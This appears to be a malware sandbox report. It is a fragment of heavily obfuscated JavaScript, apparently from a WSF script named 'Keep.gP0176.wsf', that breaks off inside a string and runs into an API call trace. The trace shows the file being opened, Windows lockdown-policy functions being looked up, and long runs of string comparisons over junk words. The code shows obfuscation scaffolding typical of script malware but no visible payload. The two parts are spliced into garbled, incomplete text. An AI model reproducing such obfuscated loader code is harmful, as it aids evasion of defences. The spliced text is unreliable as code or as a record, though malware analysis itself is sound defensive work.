'd'],\r\n triweeklies[prepartisan('0x20c', -0x34, '0x12b', 0x9a, -0x65, -'0x8f') + 'S'],\r\n -0x1 * 0x1d03 + -0x2501 * -0x1 + -0x7fd\r\n ];\r\n var actinometrical = [\r\n triweeklies[prepartisan(0x299, -'0x9', -0x19, 0x16a, 0x64, 0x19b) + 'W'],\r\n -0x366 + -0x1df9 + -0x6ad * -0x5,\r\n -0xe09 * -0x1 + 0xe15 + -0x1c1d,\r\n triweeklies[frondescent(0x492, 0x40a, '0x32f', 0x305, '0x3b3', '0x3cd') + 'v']\r\n ];\r\n return triweeklies[dreamworld(-'0x1a', '0x65', 0x61, 'rVT%', 0x162, 0x105) + 'v'];\r\n },\r\n 'AcrobatDCSylvanesque': function (roborate, kedger, isepiptesis, paganizerhaplopetalous, junglesideconvulsions, nonprofit) {\r\n function blackjackimmeshing(beginsoxanate, acquisitions, kickiestportligature, limbernessphyllomorphosis, isopsephism, turndownsphytol) {\r\n return AcrobatDCferromagnetismlabras(beginsoxanate - '0x28', acquisitions - 0x197, acquisitions - -0xb4, limbernessphyllomorphosis - '0x1a7', isopsephism, turndownsphytol - 0x5);\r\n }\r\n var coniomyceteshabenulae = {};\r\n coniomyceteshabenulae[infrequence(-0x3, '0xcc', -'0x8a', '0x155', -'0x6b', -'0x7') + 'O'] = infrequence(-0xe1, -'0x34', 0x9f, -0x129, -0x147, '0x4b') + combinable('0x152', 0x212, '0x20b', 0x114, 0x29a, 0x205) + unsquarableorological(-0x14e, -0x14, 0xa8, -'0x146', -'0x90', 'dCXe');\r\n function unsquarableorological(nonelectrification, outfield, pleuritespirulae, durian, illuviagarrotted, homaxonicchoreographers) {\r\n return AcrobatDCaccorporate(nonelectrification - '0xb4', outfield - '0x149', pleuritespirulae - 0x198, homaxonicchoreographers, illuviagarrotted - '0x7f', homaxonicchoreographers - '0x5f');\r\n }\r\n function combinable(reexercised, collusivelyacclinal, misreports, talkiesinterstriven, omnicompetenceantical, correalityparaglenal) {\r\n return AcrobatDCferromagnetismlabras(reexercised - '0x71', collusivelyacclinal - 0xaf, reexercised - -'0x40b', talkiesinterstriven - '0x1d3', omnicompetenceantical, correalityparaglenal - '0x1a3');\r\n }\r\n function unbudgeable(endoabdominalunclify, photesthesis, idololater, tannalbin, corruptress, dinnerware) {\r\n return AcrobatDCginkgoaceae(endoabdominalunclify - '0x1b8', photesthesis - 0x33, idololater - 0x78, endoabdominalunclify, corruptress - '0xfc', corruptress - -0x25e);\r\n }\r\n coniomyceteshabenulae[ochlomaniapredemand(-'0x26', 0x1c8, 0x174, 'qm7V', 0x143, '0x1f7') + 'Z'] = blackjackimmeshing('0x254', 0x202, '0x373', 0x8f, '0x1b0', 0x16a) + infrequence('0x151', 0x2ed, '0x1e7', '0x356', '0x207', '0x22c') + unsquarableorological('0x191', 0x1f6, 0x31f, '0x2bc', '0x7b', 'rsQu') + ochlomaniapredemand(-'0x10', 0x14, -0x14c, 'Gq98', -0x12a, -'0x17c') + unsquarableorological(-0x1dc, -0xc6, '0x87', -'0x253', -0x7, '3X[O');\r\n function ochlomaniapredemand(piracies, slipcote, plaistersharlequinesque, watersideambassadorially, sarcenetsantelabium, disreportsabellan) {\r\n return ") returned 0x0 [0099.058] LoadLibraryExW (lpLibFileName="WLDP.DLL", hFile=0x0, dwFlags=0x800) returned 0x7ff864110000 [0099.111] GetProcAddress (hModule=0x7ff864110000, lpProcName="WldpGetLockdownPolicy") returned 0x7ff864111010 [0099.111] GetProcAddress (hModule=0x7ff864110000, lpProcName="WldpIsClassInApprovedList") returned 0x7ff8641137b0 [0099.111] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\keep.gp0176.wsf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x234 [0099.111] GetFileSize (in: hFile=0x234, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x42eac [0099.111] CreateFileMappingA (hFile=0x234, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x42eac, lpName=0x0) returned 0x238 [0099.111] MapViewOfFile (hFileMappingObject=0x238, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x42eac) returned 0x24ae1490000 [0099.144] malloc (_Size=0x28) returned 0x24adfc67d80 [0099.144] _strnicmp (_Str1="", _MaxCount=0xd) returned 71 [0099.382] wcsncmp (_String1="onousThoracos", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.382] wcsncmp (_String1="nousThoracost", _String2="\r\n", _MaxCount=0xd) returned 97 [0099.382] wcsncmp (_String1="ousThoracosto", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.382] wcsncmp (_String1="usThoracostom", _String2="\r\n", _MaxCount=0xd) returned 104 [0099.382] wcsncmp (_String1="sThoracostomi", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.382] wcsncmp (_String1="Thoracostomie", _String2="\r\n", _MaxCount=0xd) returned 71 [0099.382] wcsncmp (_String1="horacostomies", _String2="\r\n", _MaxCount=0xd) returned 91 [0099.382] wcsncmp (_String1="oracostomies.", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.382] wcsncmp (_String1="racostomies.a", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.382] wcsncmp (_String1="acostomies.as", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.382] wcsncmp (_String1="costomies.ast", _String2="\r\n", _MaxCount=0xd) returned 86 [0099.383] wcsncmp (_String1="ostomies.asta", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.383] wcsncmp (_String1="stomies.astal", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.383] wcsncmp (_String1="tomies.astalk", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.383] wcsncmp (_String1="omies.astalkL", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.383] wcsncmp (_String1="mies.astalkLe", _String2="\r\n", _MaxCount=0xd) returned 96 [0099.383] wcsncmp (_String1="ies.astalkLeg", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.383] wcsncmp (_String1="es.astalkLegm", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.383] wcsncmp (_String1="s.astalkLegme", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.383] wcsncmp (_String1=".astalkLegmen", _String2="\r\n", _MaxCount=0xd) returned 33 [0099.383] wcsncmp (_String1="astalkLegmen?", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.383] wcsncmp (_String1="stalkLegmen?Q", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.383] wcsncmp (_String1="talkLegmen?Qu", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.383] wcsncmp (_String1="alkLegmen?Qui", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.383] wcsncmp (_String1="lkLegmen?Quiz", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.384] wcsncmp (_String1="kLegmen?Quizz", _String2="\r\n", _MaxCount=0xd) returned 94 [0099.384] wcsncmp (_String1="Legmen?Quizzi", _String2="\r\n", _MaxCount=0xd) returned 63 [0099.384] wcsncmp (_String1="egmen?Quizzit", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.384] wcsncmp (_String1="gmen?Quizzity", _String2="\r\n", _MaxCount=0xd) returned 90 [0099.384] wcsncmp (_String1="men?Quizzity.", _String2="\r\n", _MaxCount=0xd) returned 96 [0099.384] wcsncmp (_String1="en?Quizzity.\r", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.384] wcsncmp (_String1="n?Quizzity.\r\n", _String2="\r\n", _MaxCount=0xd) returned 97 [0099.384] wcsncmp (_String1="?Quizzity.\r\nB", _String2="\r\n", _MaxCount=0xd) returned 50 [0099.384] wcsncmp (_String1="Quizzity.\r\nBe", _String2="\r\n", _MaxCount=0xd) returned 68 [0099.384] wcsncmp (_String1="uizzity.\r\nBes", _String2="\r\n", _MaxCount=0xd) returned 104 [0099.384] wcsncmp (_String1="izzity.\r\nBess", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.384] wcsncmp (_String1="zzity.\r\nBesse", _String2="\r\n", _MaxCount=0xd) returned 109 [0099.384] wcsncmp (_String1="zity.\r\nBessel", _String2="\r\n", _MaxCount=0xd) returned 109 [0099.385] wcsncmp (_String1="ity.\r\nBessel:", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.385] wcsncmp (_String1="ty.\r\nBessel:M", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.385] wcsncmp (_String1="y.\r\nBessel:Mo", _String2="\r\n", _MaxCount=0xd) returned 108 [0099.385] wcsncmp (_String1=".\r\nBessel:Mor", _String2="\r\n", _MaxCount=0xd) returned 33 [0099.385] wcsncmp (_String1="\r\nBessel:Mort", _String2="\r\n", _MaxCount=0xd) returned 6 [0099.385] wcsncmp (_String1="\nBessel:Morta", _String2="\r\n", _MaxCount=0xd) returned -3 [0099.385] wcsncmp (_String1="Bessel:Mortal", _String2="\r\n", _MaxCount=0xd) returned 53 [0099.385] wcsncmp (_String1="essel:Mortal?", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.385] wcsncmp (_String1="ssel:Mortal?R", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.385] wcsncmp (_String1="sel:Mortal?Ri", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.385] wcsncmp (_String1="el:Mortal?Rib", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.385] wcsncmp (_String1="l:Mortal?Ribr", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.385] wcsncmp (_String1=":Mortal?Ribro", _String2="\r\n", _MaxCount=0xd) returned 45 [0099.386] wcsncmp (_String1="Mortal?Ribroa", _String2="\r\n", _MaxCount=0xd) returned 64 [0099.386] wcsncmp (_String1="ortal?Ribroas", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.386] wcsncmp (_String1="rtal?Ribroast", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.386] wcsncmp (_String1="tal?Ribroaste", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.386] wcsncmp (_String1="al?Ribroaster", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.386] wcsncmp (_String1="l?Ribroaster:", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.386] wcsncmp (_String1="?Ribroaster:S", _String2="\r\n", _MaxCount=0xd) returned 50 [0099.386] wcsncmp (_String1="Ribroaster:Su", _String2="\r\n", _MaxCount=0xd) returned 69 [0099.386] wcsncmp (_String1="ibroaster:Sul", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.386] wcsncmp (_String1="broaster:Sulp", _String2="\r\n", _MaxCount=0xd) returned 85 [0099.386] wcsncmp (_String1="roaster:Sulph", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.386] wcsncmp (_String1="oaster:Sulphy", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.386] wcsncmp (_String1="aster:Sulphyd", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.387] wcsncmp (_String1="ster:Sulphydr", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.387] wcsncmp (_String1="ter:Sulphydry", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.387] wcsncmp (_String1="er:Sulphydryl", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.387] wcsncmp (_String1="r:SulphydrylE", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.387] wcsncmp (_String1=":SulphydrylEc", _String2="\r\n", _MaxCount=0xd) returned 45 [0099.387] wcsncmp (_String1="SulphydrylEce", _String2="\r\n", _MaxCount=0xd) returned 70 [0099.387] wcsncmp (_String1="ulphydrylEces", _String2="\r\n", _MaxCount=0xd) returned 104 [0099.387] wcsncmp (_String1="lphydrylEcesi", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.387] wcsncmp (_String1="phydrylEcesis", _String2="\r\n", _MaxCount=0xd) returned 99 [0099.387] wcsncmp (_String1="hydrylEcesise", _String2="\r\n", _MaxCount=0xd) returned 91 [0099.387] wcsncmp (_String1="ydrylEcesises", _String2="\r\n", _MaxCount=0xd) returned 108 [0099.387] wcsncmp (_String1="drylEcesises ", _String2="\r\n", _MaxCount=0xd) returned 87 [0099.387] wcsncmp (_String1="rylEcesises m", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.388] wcsncmp (_String1="ylEcesises ma", _String2="\r\n", _MaxCount=0xd) returned 108 [0099.388] wcsncmp (_String1="lEcesises man", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.388] wcsncmp (_String1="Ecesises mant", _String2="\r\n", _MaxCount=0xd) returned 56 [0099.388] wcsncmp (_String1="cesises mantl", _String2="\r\n", _MaxCount=0xd) returned 86 [0099.388] wcsncmp (_String1="esises mantle", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.388] wcsncmp (_String1="sises mantlep", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.388] wcsncmp (_String1="ises mantlepi", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.388] wcsncmp (_String1="ses mantlepie", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.388] wcsncmp (_String1="es mantlepiec", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.388] wcsncmp (_String1="s mantlepiece", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.388] wcsncmp (_String1=" mantlepieces", _String2="\r\n", _MaxCount=0xd) returned 19 [0099.388] wcsncmp (_String1="mantlepieces.", _String2="\r\n", _MaxCount=0xd) returned 96 [0099.388] wcsncmp (_String1="antlepieces.\r", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.388] wcsncmp (_String1="ntlepieces.\r\n", _String2="\r\n", _MaxCount=0xd) returned 97 [0099.388] wcsncmp (_String1="tlepieces.\r\nv", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.388] wcsncmp (_String1="lepieces.\r\nvi", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.388] wcsncmp (_String1="epieces.\r\nvic", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.388] wcsncmp (_String1="pieces.\r\nvict", _String2="\r\n", _MaxCount=0xd) returned 99 [0099.389] wcsncmp (_String1="ieces.\r\nvictu", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.389] wcsncmp (_String1="eces.\r\nvictua", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.389] wcsncmp (_String1="ces.\r\nvictual", _String2="\r\n", _MaxCount=0xd) returned 86 [0099.389] wcsncmp (_String1="es.\r\nvictuala", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.389] wcsncmp (_String1="s.\r\nvictualag", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.389] wcsncmp (_String1=".\r\nvictualage", _String2="\r\n", _MaxCount=0xd) returned 33 [0099.389] wcsncmp (_String1="\r\nvictualageS", _String2="\r\n", _MaxCount=0xd) returned 58 [0099.389] wcsncmp (_String1="\nvictualageSt", _String2="\r\n", _MaxCount=0xd) returned -3 [0099.389] wcsncmp (_String1="victualageSto", _String2="\r\n", _MaxCount=0xd) returned 105 [0099.389] wcsncmp (_String1="ictualageStov", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.389] wcsncmp (_String1="ctualageStovi", _String2="\r\n", _MaxCount=0xd) returned 86 [0099.389] wcsncmp (_String1="tualageStovie", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.389] wcsncmp (_String1="ualageStovies", _String2="\r\n", _MaxCount=0xd) returned 104 [0099.390] wcsncmp (_String1="alageStovies.", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.390] wcsncmp (_String1="lageStovies.s", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.390] wcsncmp (_String1="ageStovies.sl", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.390] wcsncmp (_String1="geStovies.slu", _String2="\r\n", _MaxCount=0xd) returned 90 [0099.390] wcsncmp (_String1="eStovies.slug", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.390] wcsncmp (_String1="Stovies.slugw", _String2="\r\n", _MaxCount=0xd) returned 70 [0099.390] wcsncmp (_String1="tovies.slugwo", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.390] wcsncmp (_String1="ovies.slugwoo", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.390] wcsncmp (_String1="vies.slugwood", _String2="\r\n", _MaxCount=0xd) returned 105 [0099.390] wcsncmp (_String1="ies.slugwoodB", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.390] wcsncmp (_String1="es.slugwoodBo", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.390] wcsncmp (_String1="s.slugwoodBor", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.390] wcsncmp (_String1=".slugwoodBoro", _String2="\r\n", _MaxCount=0xd) returned 33 [0099.391] wcsncmp (_String1="slugwoodBorou", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.391] wcsncmp (_String1="lugwoodBoroug", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.391] wcsncmp (_String1="ugwoodBorough", _String2="\r\n", _MaxCount=0xd) returned 104 [0099.391] wcsncmp (_String1="gwoodBoroughm", _String2="\r\n", _MaxCount=0xd) returned 90 [0099.391] wcsncmp (_String1="woodBoroughma", _String2="\r\n", _MaxCount=0xd) returned 106 [0099.391] wcsncmp (_String1="oodBoroughmas", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.391] wcsncmp (_String1="odBoroughmast", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.391] wcsncmp (_String1="dBoroughmaste", _String2="\r\n", _MaxCount=0xd) returned 87 [0099.391] wcsncmp (_String1="Boroughmaster", _String2="\r\n", _MaxCount=0xd) returned 53 [0099.391] wcsncmp (_String1="oroughmaster ", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.391] wcsncmp (_String1="roughmaster D", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.391] wcsncmp (_String1="oughmaster Di", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.391] wcsncmp (_String1="ughmaster Dis", _String2="\r\n", _MaxCount=0xd) returned 104 [0099.391] wcsncmp (_String1="ghmaster Disp", _String2="\r\n", _MaxCount=0xd) returned 90 [0099.391] wcsncmp (_String1="hmaster Dispa", _String2="\r\n", _MaxCount=0xd) returned 91 [0099.391] wcsncmp (_String1="master Dispar", _String2="\r\n", _MaxCount=0xd) returned 96 [0099.391] wcsncmp (_String1="aster Dispari", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.391] wcsncmp (_String1="ster Disparis", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.391] wcsncmp (_String1="ter Dispariso", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.391] wcsncmp (_String1="er Disparison", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.392] wcsncmp (_String1="r Disparison:", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.392] wcsncmp (_String1=" Disparison:D", _String2="\r\n", _MaxCount=0xd) returned 19 [0099.392] wcsncmp (_String1="Disparison:Di", _String2="\r\n", _MaxCount=0xd) returned 55 [0099.392] wcsncmp (_String1="isparison:Dir", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.392] wcsncmp (_String1="sparison:Dire", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.392] wcsncmp (_String1="parison:Direc", _String2="\r\n", _MaxCount=0xd) returned 99 [0099.392] wcsncmp (_String1="arison:Direct", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.392] wcsncmp (_String1="rison:Directi", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.392] wcsncmp (_String1="ison:Directio", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.392] wcsncmp (_String1="son:Direction", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.392] wcsncmp (_String1="on:Directiona", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.392] wcsncmp (_String1="n:Directional", _String2="\r\n", _MaxCount=0xd) returned 97 [0099.392] wcsncmp (_String1=":Directionali", _String2="\r\n", _MaxCount=0xd) returned 45 [0099.392] wcsncmp (_String1="Directionalit", _String2="\r\n", _MaxCount=0xd) returned 55 [0099.392] wcsncmp (_String1="irectionality", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.392] wcsncmp (_String1="rectionalityA", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.392] wcsncmp (_String1="ectionalityAn", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.392] wcsncmp (_String1="ctionalityAnt", _String2="\r\n", _MaxCount=0xd) returned 86 [0099.392] wcsncmp (_String1="tionalityAntr", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.393] wcsncmp (_String1="ionalityAntru", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.393] wcsncmp (_String1="onalityAntrum", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.393] wcsncmp (_String1="nalityAntrum:", _String2="\r\n", _MaxCount=0xd) returned 97 [0099.393] wcsncmp (_String1="alityAntrum:H", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.393] wcsncmp (_String1="lityAntrum:Hy", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.393] wcsncmp (_String1="ityAntrum:Hyd", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.393] wcsncmp (_String1="tyAntrum:Hydr", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.393] wcsncmp (_String1="yAntrum:Hydro", _String2="\r\n", _MaxCount=0xd) returned 108 [0099.393] wcsncmp (_String1="Antrum:Hydrog", _String2="\r\n", _MaxCount=0xd) returned 52 [0099.394] wcsncmp (_String1="ntrum:Hydroga", _String2="\r\n", _MaxCount=0xd) returned 97 [0099.394] wcsncmp (_String1="trum:Hydrogal", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.394] wcsncmp (_String1="rum:Hydrogalv", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.394] wcsncmp (_String1="um:Hydrogalva", _String2="\r\n", _MaxCount=0xd) returned 104 [0099.394] wcsncmp (_String1="m:Hydrogalvan", _String2="\r\n", _MaxCount=0xd) returned 96 [0099.394] wcsncmp (_String1=":Hydrogalvani", _String2="\r\n", _MaxCount=0xd) returned 45 [0099.394] wcsncmp (_String1="Hydrogalvanic", _String2="\r\n", _MaxCount=0xd) returned 59 [0099.394] wcsncmp (_String1="ydrogalvanicI", _String2="\r\n", _MaxCount=0xd) returned 108 [0099.394] wcsncmp (_String1="drogalvanicIg", _String2="\r\n", _MaxCount=0xd) returned 87 [0099.394] wcsncmp (_String1="rogalvanicIgn", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.394] wcsncmp (_String1="ogalvanicIgno", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.394] wcsncmp (_String1="galvanicIgnor", _String2="\r\n", _MaxCount=0xd) returned 90 [0099.394] wcsncmp (_String1="alvanicIgnore", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.394] wcsncmp (_String1="lvanicIgnored", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.394] wcsncmp (_String1="vanicIgnored!", _String2="\r\n", _MaxCount=0xd) returned 105 [0099.395] wcsncmp (_String1="anicIgnored!m", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.395] wcsncmp (_String1="nicIgnored!ma", _String2="\r\n", _MaxCount=0xd) returned 97 [0099.395] wcsncmp (_String1="icIgnored!mar", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.395] wcsncmp (_String1="cIgnored!mara", _String2="\r\n", _MaxCount=0xd) returned 86 [0099.395] wcsncmp (_String1="Ignored!marac", _String2="\r\n", _MaxCount=0xd) returned 60 [0099.395] wcsncmp (_String1="gnored!maraca", _String2="\r\n", _MaxCount=0xd) returned 90 [0099.395] wcsncmp (_String1="nored!maracai", _String2="\r\n", _MaxCount=0xd) returned 97 [0099.395] wcsncmp (_String1="ored!maracaib", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.395] wcsncmp (_String1="red!maracaibo", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.395] wcsncmp (_String1="ed!maracaiboA", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.395] wcsncmp (_String1="d!maracaiboAp", _String2="\r\n", _MaxCount=0xd) returned 87 [0099.395] wcsncmp (_String1="!maracaiboApp", _String2="\r\n", _MaxCount=0xd) returned 20 [0099.395] wcsncmp (_String1="maracaiboAppo", _String2="\r\n", _MaxCount=0xd) returned 96 [0099.395] wcsncmp (_String1="aracaiboAppor", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.395] wcsncmp (_String1="racaiboApport", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.395] wcsncmp (_String1="acaiboApporti", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.395] wcsncmp (_String1="caiboApportio", _String2="\r\n", _MaxCount=0xd) returned 86 [0099.395] wcsncmp (_String1="aiboApportion", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.396] wcsncmp (_String1="iboApportioni", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.396] wcsncmp (_String1="boApportionin", _String2="\r\n", _MaxCount=0xd) returned 85 [0099.396] wcsncmp (_String1="oApportioning", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.396] wcsncmp (_String1="Apportioning ", _String2="\r\n", _MaxCount=0xd) returned 52 [0099.396] wcsncmp (_String1="pportioning R", _String2="\r\n", _MaxCount=0xd) returned 99 [0099.396] wcsncmp (_String1="portioning Ri", _String2="\r\n", _MaxCount=0xd) returned 99 [0099.396] wcsncmp (_String1="ortioning Rig", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.396] wcsncmp (_String1="rtioning Righ", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.396] wcsncmp (_String1="tioning Right", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.396] wcsncmp (_String1="ioning Rightl", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.396] wcsncmp (_String1="oning Rightly", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.396] wcsncmp (_String1="ning Rightly:", _String2="\r\n", _MaxCount=0xd) returned 97 [0099.396] wcsncmp (_String1="ing Rightly:s", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.397] wcsncmp (_String1="ng Rightly:so", _String2="\r\n", _MaxCount=0xd) returned 97 [0099.397] wcsncmp (_String1="g Rightly:soo", _String2="\r\n", _MaxCount=0xd) returned 90 [0099.397] wcsncmp (_String1=" Rightly:soot", _String2="\r\n", _MaxCount=0xd) returned 19 [0099.397] wcsncmp (_String1="Rightly:sooth", _String2="\r\n", _MaxCount=0xd) returned 69 [0099.397] wcsncmp (_String1="ightly:soothl", _String2="\r\n", _MaxCount=0xd) returned 92 [0099.397] wcsncmp (_String1="ghtly:soothle", _String2="\r\n", _MaxCount=0xd) returned 90 [0099.397] wcsncmp (_String1="htly:soothles", _String2="\r\n", _MaxCount=0xd) returned 91 [0099.397] wcsncmp (_String1="tly:soothless", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.397] wcsncmp (_String1="ly:soothlessO", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.397] wcsncmp (_String1="y:soothlessOv", _String2="\r\n", _MaxCount=0xd) returned 108 [0099.397] wcsncmp (_String1=":soothlessOve", _String2="\r\n", _MaxCount=0xd) returned 45 [0099.397] wcsncmp (_String1="soothlessOver", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.398] wcsncmp (_String1="oothlessOverb", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.398] wcsncmp (_String1="othlessOverba", _String2="\r\n", _MaxCount=0xd) returned 98 [0099.398] wcsncmp (_String1="thlessOverbal", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.398] wcsncmp (_String1="hlessOverball", _String2="\r\n", _MaxCount=0xd) returned 91 [0099.398] wcsncmp (_String1="lessOverballa", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.398] wcsncmp (_String1="essOverballas", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.398] wcsncmp (_String1="ssOverballast", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.398] wcsncmp (_String1="sOverballast?", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.398] wcsncmp (_String1="Overballast?r", _String2="\r\n", _MaxCount=0xd) returned 66 [0099.398] wcsncmp (_String1="verballast?ro", _String2="\r\n", _MaxCount=0xd) returned 105 [0099.398] wcsncmp (_String1="erballast?rot", _String2="\r\n", _MaxCount=0xd) returned 88 [0099.398] wcsncmp (_String1="rballast?roto", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.399] wcsncmp (_String1="ballast?rotog", _String2="\r\n", _MaxCount=0xd) returned 85 [0099.399] wcsncmp (_String1="allast?rotogr", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.399] wcsncmp (_String1="llast?rotogra", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.399] wcsncmp (_String1="last?rotograv", _String2="\r\n", _MaxCount=0xd) returned 95 [0099.399] wcsncmp (_String1="ast?rotogravu", _String2="\r\n", _MaxCount=0xd) returned 84 [0099.399] wcsncmp (_String1="st?rotogravur", _String2="\r\n", _MaxCount=0xd) returned 102 [0099.399] wcsncmp (_String1="t?rotogravure", _String2="\r\n", _MaxCount=0xd) returned 103 [0099.399] wcsncmp (_String1="?rotogravures", _String2="\r\n", _MaxCount=0xd) returned 50 [0099.399] wcsncmp (_String1="rotogravures?", _String2="\r\n", _MaxCount=0xd) returned 101 [0099.400] SetLastError (dwErrCode=0xb) [0099.400] GetLastError () returned 0xb [0099.401] SetLastError 